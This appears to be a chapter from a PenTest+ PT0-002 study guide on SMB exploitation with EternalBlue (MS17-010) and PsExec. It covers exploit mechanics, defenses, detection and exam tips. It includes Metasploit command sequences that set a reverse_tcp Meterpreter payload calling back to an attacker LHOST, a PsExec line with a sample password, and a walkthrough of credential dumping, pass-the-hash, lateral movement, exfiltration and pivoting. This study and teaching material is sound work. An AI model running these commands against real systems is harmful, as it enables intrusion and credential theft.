This chapter covers the exploitation of the Server Message Block (SMB) protocol, focusing on two critical tools: EternalBlue (MS17-010 exploit) and PsExec. Understanding these attacks is vital for the PT0-002 exam, as they represent classic examples of exploiting legacy protocols and leveraging post-exploitation tools for lateral movement. Approximately 5-8% of exam questions touch on SMB exploitation, vulnerability scanning, and remote execution techniques. Mastering this content will help you identify, execute, and defend against these attacks in penetration testing scenarios.
Jump to a section
Imagine a high-security bank vault with a complex locking mechanism. The vault's locking system has a critical flaw: a hidden maintenance port used by technicians to reset the lock in emergencies. An attacker learns about this port and crafts a special tool that sends a series of precise electrical pulses to the port, causing the lock's firmware to crash and enter an unsafe state, granting full access without the combination. Once inside, the attacker uses a master key (a privileged token) that allows them to open any safety deposit box or execute any command on the bank's internal network. This master key can be used to remotely install malware, extract data, or move laterally to other branches. The attack succeeds because the bank never patched the maintenance port vulnerability and the master key was left in a default configuration. The SMB exploitation chain works similarly: EternalBlue exploits a buffer overflow in the SMBv1 protocol (the maintenance port) to gain SYSTEM-level access (the master key), and PsExec then uses that access to execute commands remotely, like opening all the deposit boxes.
What is SMB and Why is it a Target?
Server Message Block (SMB) is a network file sharing protocol that allows applications to read and write to files and request services from server programs in a computer network. Originally developed by IBM, SMB has been heavily used in Windows environments for file sharing, printer sharing, and remote administration. The protocol operates at the application layer over TCP port 445 (direct SMB) or port 139 (NetBIOS over TCP/IP). SMBv1, introduced in the 1980s, is notoriously insecure and was the vector for the WannaCry ransomware attack in 2017. The PT0-002 exam tests your ability to exploit SMB vulnerabilities, specifically EternalBlue (MS17-010) which targets SMBv1, and to use PsExec for remote command execution.
EternalBlue (MS17-010) – The Buffer Overflow Exploit
EternalBlue is a cyberattack exploit developed by the U.S. National Security Agency (NSA) and leaked by the Shadow Brokers group in 2017. It exploits a vulnerability in Microsoft's implementation of the SMBv1 protocol, officially designated MS17-010 (CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147). The vulnerability exists in the way SMBv1 handles certain crafted packets, specifically in the parsing of the SrvOs2FeaListSizeToNt function in the srv.sys driver. An attacker can send a specially crafted packet to a target SMBv1 server, causing a buffer overflow that allows arbitrary code execution with SYSTEM privileges.
#### How EternalBlue Works Internally
The exploit works by sending a series of SMB packets that trigger a race condition and a buffer overflow. Here is a step-by-step mechanism:
Initial Negotiation: The attacker sends an SMBv1 negotiate protocol request to the target on TCP port 445. The target responds with its capabilities.
Session Setup: The attacker performs a session setup with null credentials (anonymous login) or valid credentials if available. The exploit does not require authentication; it works on unpatched systems even without valid credentials.
Tree Connect: The attacker connects to a shared resource, typically the IPC$ share (interprocess communication), using a tree connect request.
Trans2 Request: The attacker sends a crafted Trans2 secondary request with a malformed SMB_FEA (File Extended Attributes) list. The vulnerability lies in the SrvOs2FeaListSizeToNt function, which calculates the size of the FEA list. By manipulating the FEA list size fields, the attacker causes a buffer overflow in the non-paged pool memory.
Race Condition: The exploit triggers a race condition between two threads in the SMB driver. One thread modifies the FEA list size while another thread uses it, leading to a use-after-free or buffer overflow condition.
Shellcode Execution: The overflow overwrites critical kernel structures, allowing the attacker to execute shellcode with SYSTEM privileges. The shellcode typically creates a backdoor or executes a payload.
#### Key Components and Values
Target Port: TCP 445 (SMB over IP)
Vulnerability: Buffer overflow in srv.sys driver
Affected Systems: Windows Vista, Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows 8.1, Windows Server 2012, Windows Server 2012 R2, and early versions of Windows 10 before the MS17-010 patch.
Patch: MS17-010 security update released in March 2017.
Exploit Tools: Metasploit module exploit/windows/smb/ms17_010_eternalblue, AutoBlue-MS17-010 script, and the original EternalBlue binary.
#### Configuration and Verification Commands
To check if a system is vulnerable to MS17-010, you can use the following commands:
Nmap Script: nmap -p 445 --script smb-vuln-ms17-010 <target>
Metasploit Scanner: use auxiliary/scanner/smb/smb_ms17_010 then set RHOSTS <target> and run
Manual Check: Send a crafted packet using a Python script that mimics the exploit's initial handshake and check for a specific response.
To exploit using Metasploit:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > exploitPsExec – Remote Command Execution Tool
PsExec is a lightweight telnet-replacement tool from Microsoft Sysinternals that allows you to execute processes on remote systems. It works by copying a small binary (psexesvc.exe) to the remote system's ADMIN$ share (which maps to C:\Windows), installing a Windows service, and then running commands through that service. PsExec requires administrative credentials on the target and relies on SMB for file copy and service control.
#### How PsExec Works Internally
Authentication: The attacker provides valid administrative credentials (username and password) for the target system. PsExec uses these to authenticate over SMB.
Service Binary Copy: PsExec connects to the ADMIN$ share on the target (using SMB) and copies psexesvc.exe to C:\Windows\psexesvc.exe. This binary is a small service executable.
Service Creation: PsExec uses the Windows Service Control Manager (SCM) remotely via SMB to create a new service named PSEXESVC (or a random name) that points to psexesvc.exe. This is done using OpenSCManager and CreateService APIs over the svcctl named pipe.
Service Start: PsExec starts the service, which runs as SYSTEM on the target. The service listens on a named pipe for commands from the client.
Command Execution: The PsExec client sends the command to be executed (e.g., cmd.exe /c whoami) over the named pipe. The service executes the command and returns the output.
Cleanup: After execution, PsExec stops and deletes the service, and optionally removes the psexesvc.exe binary.
#### Interaction with EternalBlue
EternalBlue provides a SYSTEM-level shell or a Meterpreter session on the target. From that session, an attacker can upload and run PsExec to move laterally to other systems. For example, after gaining initial access via EternalBlue, the attacker can dump local credentials using Mimikatz, then use those credentials with PsExec to access other machines on the network. This combination is a classic lateral movement technique tested on the PT0-002 exam.
#### Key Components and Values
Ports: TCP 445 (SMB), TCP 135 (RPC Endpoint Mapper), and dynamic high ports for named pipes.
Required Privileges: Administrative rights on the target (local Administrator or domain admin).
Binary: psexec.exe (client) and psexesvc.exe (service).
Service Name: PSEXESVC (or random if -r option is used).
Share Used: ADMIN$ (admin share pointing to C:\Windows).
#### Configuration and Verification Commands
Basic PsExec command: psexec \\192.168.1.100 -u Administrator -p P@ssw0rd cmd.exe
Using Metasploit's PsExec module: use exploit/windows/smb/psexec then set RHOSTS, SMBUser, SMBPass, and PAYLOAD.
Verification: Check if the target has SMB port 445 open and if the ADMIN$ share is accessible with credentials.
Defense and Detection
Defending against EternalBlue and PsExec involves:
- Disabling SMBv1: SMBv1 is deprecated and should be disabled on all systems. Use PowerShell: Set-SmbServerConfiguration -EnableSMB1Protocol $false.
- Patching: Apply MS17-010 and subsequent security updates.
- Network Segmentation: Restrict SMB traffic to trusted networks only.
- Monitoring: Enable logging of SMB connections and service creation events (Event ID 7045 for service creation).
- Least Privilege: Limit administrative accounts and use strong passwords.
Detection of EternalBlue exploitation can be done via network intrusion detection systems (NIDS) that look for specific SMB packet patterns, such as a large Trans2 request with malformed FEA lists. PsExec usage can be detected by monitoring for the creation of the PSEXESVC service (Event ID 7045) or the presence of psexesvc.exe in C:\Windows.
Scan for SMB Vulnerabilities
Use Nmap or Metasploit to scan the target for SMB vulnerabilities. Run `nmap -p 445 --script smb-vuln-ms17-010 <target>` to check if the target is vulnerable to EternalBlue. The script sends a crafted SMB packet that triggers a specific response if the system is unpatched. Alternatively, use Metasploit's auxiliary scanner `smb_ms17_010` to perform the same check. This step identifies potential targets for exploitation.
Exploit EternalBlue for Initial Access
Once a vulnerable target is identified, launch the EternalBlue exploit. In Metasploit, use `use exploit/windows/smb/ms17_010_eternalblue`, set the payload to a reverse shell (e.g., `windows/x64/meterpreter/reverse_tcp`), and set `RHOSTS`, `LHOST`, and `LPORT`. Run the exploit. The exploit sends a series of malformed SMB packets that trigger a buffer overflow in the SMB driver, resulting in arbitrary code execution with SYSTEM privileges. A successful exploit opens a Meterpreter session.
Dump Credentials from the Victim
With a Meterpreter session on the victim, use the `kiwi` module (Mimikatz) to dump local credentials. Run `load kiwi` then `creds_all` to retrieve hashed passwords. Alternatively, use `hashdump` command to dump the SAM database. This step gathers administrative credentials that can be used to move laterally to other systems. The credentials may be in NTLM hash format, which can be used for pass-the-hash attacks.
Use PsExec for Lateral Movement
With administrative credentials obtained, use PsExec to execute commands on other target systems. In Metasploit, use `use exploit/windows/smb/psexec`. Set `RHOSTS` to a new target, `SMBUser` to the administrator username, `SMBPass` to the NTLM hash or password, and set a payload (e.g., `windows/meterpreter/reverse_tcp`). Run the exploit. PsExec copies the service binary to the ADMIN$ share, creates and starts a service, and executes the payload. This grants a new Meterpreter session on the lateral target.
Post-Exploitation and Pivoting
After gaining access to multiple systems, perform post-exploitation actions such as keylogging, screen capture, and data exfiltration. Use the compromised systems as pivots to reach deeper network segments. For example, use the `autoroute` module in Metasploit to route traffic through the compromised host to access internal networks. This step demonstrates full network compromise, which is the goal of a penetration test. Clean up traces by deleting uploaded binaries and stopping services.
In a typical enterprise penetration test, SMB exploitation is often the quickest path to domain admin. Consider a scenario where a company has a legacy Windows Server 2008 R2 system running an internal file share. This server is unpatched and has SMBv1 enabled because it shares files with older equipment. The penetration tester scans the internal network and identifies this server as vulnerable to EternalBlue. Exploiting it yields SYSTEM access. From there, the tester dumps credentials and finds a local administrator password that is reused across all workstations. Using PsExec, the tester moves laterally to the domain controller, gaining full control. This scenario is common in environments with poor patch management and password reuse.
Another scenario involves a healthcare organization with a mix of Windows 7 machines in a clinical network. The tester uses EternalBlue to compromise a nurse's station, then uses PsExec to deploy ransomware simulation to test incident response. The test demonstrates that the network segmentation between clinical and administrative networks is insufficient, as SMB traffic flows freely. The tester recommends disabling SMBv1, implementing network access control (NAC), and enforcing strong unique passwords.
Performance considerations: EternalBlue exploits can be noisy and may crash the target if the exploit fails (blue screen). In production, testers must be careful to avoid denial of service. PsExec is reliable but leaves traces in the Windows event logs (service creation event 7045). For stealth, testers may use alternatives like WMI or PowerShell remoting. Misconfiguration of SMB shares, such as allowing null sessions or enabling guest access, can also be exploited. Common mistakes include leaving SMBv1 enabled for backward compatibility without compensating controls, and using the same local administrator password across all systems (Pass-the-Hash vulnerability).
The PT0-002 exam tests SMB exploitation in the context of Attacks and Exploits (Objective 3.1). Specifically, you must understand the mechanics of EternalBlue (MS17-010) and how PsExec is used for lateral movement. Common wrong answers include:
Thinking EternalBlue requires authentication: Many candidates believe the exploit needs valid credentials. In reality, EternalBlue works against unpatched SMBv1 without authentication. The vulnerability is pre-authentication.
Confusing PsExec with other remote execution tools: PsExec uses SMB and the ADMIN$ share. Candidates often mistake it for WMI (port 135) or WinRM (port 5985/5986). PsExec specifically copies a service binary and creates a service.
Assuming EternalBlue only works on Windows 7: While Windows 7 is a common target, the vulnerability affects many versions including Windows Server 2008, 2008 R2, 2012, and early Windows 10 builds before the patch.
Mixing up ports: SMB over IP uses TCP 445; NetBIOS over TCP/IP uses TCP 139. PsExec primarily uses 445, but also touches 135 for RPC. Exam questions may ask which port is used for SMB directly.
Numbers to memorize: MS17-010, CVE-2017-0144 (primary), TCP 445, service name PSEXESVC, ADMIN$ share. Edge cases: EternalBlue can be exploited on Windows 10 version 1511 and earlier (before patch). PsExec can be used with a hash (pass-the-hash) using the -hashes option in Metasploit. The exam may present a scenario where you have a hash but not a password – PsExec can still work with the hash.
To eliminate wrong answers, focus on the underlying mechanism: EternalBlue is a buffer overflow in the SMBv1 driver (srv.sys) triggered by a crafted Trans2 packet. PsExec is a service-based execution method that requires admin credentials and SMB access to ADMIN$. If the question mentions 'null session' or 'guest access', it's likely about SMB enumeration, not EternalBlue.
EternalBlue (MS17-010) exploits SMBv1 on TCP port 445 without requiring authentication.
The vulnerability is a buffer overflow in the srv.sys driver triggered by a crafted Trans2 packet.
PsExec copies psexesvc.exe to ADMIN$, creates a service, and executes commands as SYSTEM.
PsExec requires administrative credentials but can use NTLM hashes via pass-the-hash.
EternalBlue affects Windows Vista, 7, 8.1, Server 2008/2008R2/2012/2012R2, and early Windows 10.
Disabling SMBv1 and applying MS17-010 patch are critical defenses.
Detection: Event ID 7045 for service creation (PsExec), and anomalous SMB packets for EternalBlue.
Metasploit modules: exploit/windows/smb/ms17_010_eternalblue and exploit/windows/smb/psexec.
These come up on the exam all the time. Here's how to tell them apart.
EternalBlue
Exploits SMBv1 buffer overflow (MS17-010)
No authentication required
Grants SYSTEM-level remote code execution
Targets unpatched Windows systems
Often used for initial access
PsExec
Legitimate administrative tool from Sysinternals
Requires valid administrative credentials
Executes commands via service creation
Works on fully patched systems if credentials are known
Used for lateral movement after initial access
Mistake
EternalBlue requires valid credentials to exploit.
Correct
EternalBlue exploits a pre-authentication vulnerability in SMBv1. No credentials are needed; the exploit sends crafted packets before authentication completes.
Mistake
PsExec only works with password, not hashes.
Correct
PsExec can be used with NTLM hashes via pass-the-hash techniques. In Metasploit, the psexec module accepts an SMBPass value that can be an NTLM hash.
Mistake
EternalBlue only affects Windows 7.
Correct
MS17-010 affects a wide range of Windows versions including Vista, 7, 8.1, Server 2008, 2008 R2, 2012, 2012 R2, and early Windows 10 builds before the March 2017 patch.
Mistake
SMB uses TCP port 139 for direct SMB communication.
Correct
Direct SMB over TCP uses port 445. Port 139 is used for NetBIOS session service, which can transport SMB but is older and less common.
Mistake
PsExec requires the target to have a writable ADMIN$ share.
Correct
PsExec requires administrative credentials to access ADMIN$ (which is hidden but writable by admins). If ADMIN$ is not accessible, PsExec fails.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
EternalBlue is an exploit that takes advantage of a vulnerability in SMBv1 to gain remote code execution without authentication. PsExec is a legitimate tool that uses SMB to execute commands on remote systems, but it requires valid administrative credentials. EternalBlue is used for initial compromise, while PsExec is used for lateral movement after obtaining credentials.
No, EternalBlue only works on unpatched systems. Microsoft released MS17-010 in March 2017, which patched the vulnerability. Fully updated Windows 10 systems are not vulnerable. However, some older Windows 10 builds (version 1511 and earlier) may be vulnerable if not updated.
PsExec primarily uses TCP port 445 (SMB) to copy files and communicate with the service. It also uses TCP port 135 (RPC Endpoint Mapper) initially to locate the SMB service, and dynamic high ports for named pipes. In practice, allowing SMB (445) is sufficient.
PsExec creates a service named PSEXESVC (or a random name if -r is used). Monitor Event ID 7045 (service creation) in Windows Event Logs. Also, look for the file psexesvc.exe in C:\Windows. Network monitoring can detect SMB writes to ADMIN$ and subsequent service control requests.
No, Windows Server 2019 is not vulnerable to EternalBlue as it does not include SMBv1 by default and is fully patched. However, if SMBv1 is manually enabled and the system is not updated, it could be vulnerable, but this is extremely unlikely.
SMBv1 is the original protocol from the 1980s, which is insecure and lacks encryption. SMBv2 (introduced in Vista) and SMBv3 (Windows 8/Server 2012) offer improved security, encryption (SMBv3), and performance. EternalBlue only affects SMBv1. SMBv2/3 are not vulnerable to this exploit.
Yes, PsExec can be used with NTLM hashes through pass-the-hash. In Metasploit's psexec module, set SMBPass to the NTLM hash (LM:NT format). The standalone PsExec tool does not natively support hashes, but tools like impacket's psexec.py do.
You've just covered SMB Exploitation: EternalBlue and PsExec — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?